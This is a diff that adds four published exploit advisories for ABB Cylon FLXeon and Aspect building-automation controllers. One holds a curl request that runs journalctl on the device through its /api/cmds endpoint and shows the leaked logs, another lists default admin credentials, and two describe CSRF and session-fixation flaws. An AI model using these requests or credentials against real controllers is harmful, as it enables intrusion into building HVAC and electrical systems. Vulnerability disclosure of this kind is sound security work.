diff --git a/exploits/multiple/hardware/52178.txt b/exploits/multiple/hardware/52178.txt new file mode 100644 index 000000000..c7dd15e81 --- /dev/null +++ b/exploits/multiple/hardware/52178.txt @@ -0,0 +1,96 @@ +# Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: An authenticated attacker can access sensitive information via the system logs +page of ABB Cylon FLXeon controllers. The logs expose critical data, including the +OpenSSL password for stored certificates. This information can be leveraged for further +attacks, such as decrypting encrypted communications, impersonation, or gaining deeper +system access. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5920 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php +CVE ID: CVE-2024-48852 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -k "https://7.3.3.1/api/cmds" \ # JS > /diagnostics/logs-system (platform-dist) +> -H "Cookie: user_sid=xxx" \ +> -d "{\"cmd\":\"journalctl -b -r --no-hostname ^| head -c 600000 \"}" + +-- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. -- +Feb 13 12:38:26 node[5810]: at endReadableNT (_stream_readable.js:1059:12) +Feb 13 12:38:26 node[5810]: at IncomingMessage.emit (events.js:207:7) +Feb 13 12:38:26 node[5810]: at emitNone (events.js:105:13) +Feb 13 12:38:26 node[5810]: at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7) +Feb 13 12:38:26 node[5810]: at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7) +Feb 13 12:38:26 node[5810]: at invokeCallback (/home/MIX_CMIX/node-serve"} +... +... +Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" +Sep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" +Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' +Sep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' +Sep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/ +... +... \ No newline at end of file diff --git a/exploits/multiple/hardware/52179.txt b/exploits/multiple/hardware/52179.txt new file mode 100644 index 000000000..c42ed480b --- /dev/null +++ b/exploits/multiple/hardware/52179.txt @@ -0,0 +1,79 @@ +ABB Cylon FLXeon 9.3.4 Default Credentials + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + ABB UC32 Series Main Plant Controllers (Cylon's UnitronUC32.xx) + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller uses a weak set of default administrative +credentials that can be guessed in remote password attacks and gain full control of +the system. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5919 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5919.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ cat cyloncreds.txt +admin:cylonctl +cxpro:siteguide +UC32Net:CylonCtl \ No newline at end of file diff --git a/exploits/multiple/hardware/52180.txt b/exploits/multiple/hardware/52180.txt new file mode 100644 index 000000000..bed7c5315 --- /dev/null +++ b/exploits/multiple/hardware/52180.txt @@ -0,0 +1,50 @@ +# Exploit title: ABB Cylon FLXeon 9.3.4 Limited Cross-Site Request Forgery +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) + CBX Series (FLX Series) + CBT Series + CBV Series + Firmware: <=9.3.4 + +Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a +series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: A CSRF vulnerability has been identified in the ABB Cylon FLXeon series. However, +exploitation is limited to specific conditions due to the server's CORS configuration +(Access-Control-Allow-Origin: * without Access-Control-Allow-Credentials: true). The +vulnerability can only be exploited under the following scenarios: + Same Domain: The attacker must host the malicious page on the same domain as the + target server. + Man-in-the-Middle (MitM): The attacker can intercept and modify traffic between + the user and the server (e.g., on an unsecured network). + Local Area Network (LAN) Access: The attacker must have access to the same network + as the target server. + Subdomains: The attacker can host the malicious page on a subdomain if the server + allows it. + Misconfigured CORS: The server’s CORS policy is misconfigured to allow certain + origins or headers. + Reflected XSS: The attacker can exploit a reflected XSS vulnerability to execute + JavaScript in the context of the target origin. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5918 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5918.php \ No newline at end of file diff --git a/exploits/multiple/hardware/52182.txt b/exploits/multiple/hardware/52182.txt new file mode 100644 index 000000000..6ac0c850e --- /dev/null +++ b/exploits/multiple/hardware/52182.txt @@ -0,0 +1,81 @@ +# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability +# Advisory ID: ZSL-2025-5916 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php +# CVE ID: CVE-2024-11317 +# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317 + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session +fixation, allowing an attacker to set a predefined PHPSESSID value. An +attacker can leverage an unauthenticated reflected XSS vulnerability in +jsonProxy.php to inject a crafted request, forcing the victim to adopt +a fixated session. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +
+ + + +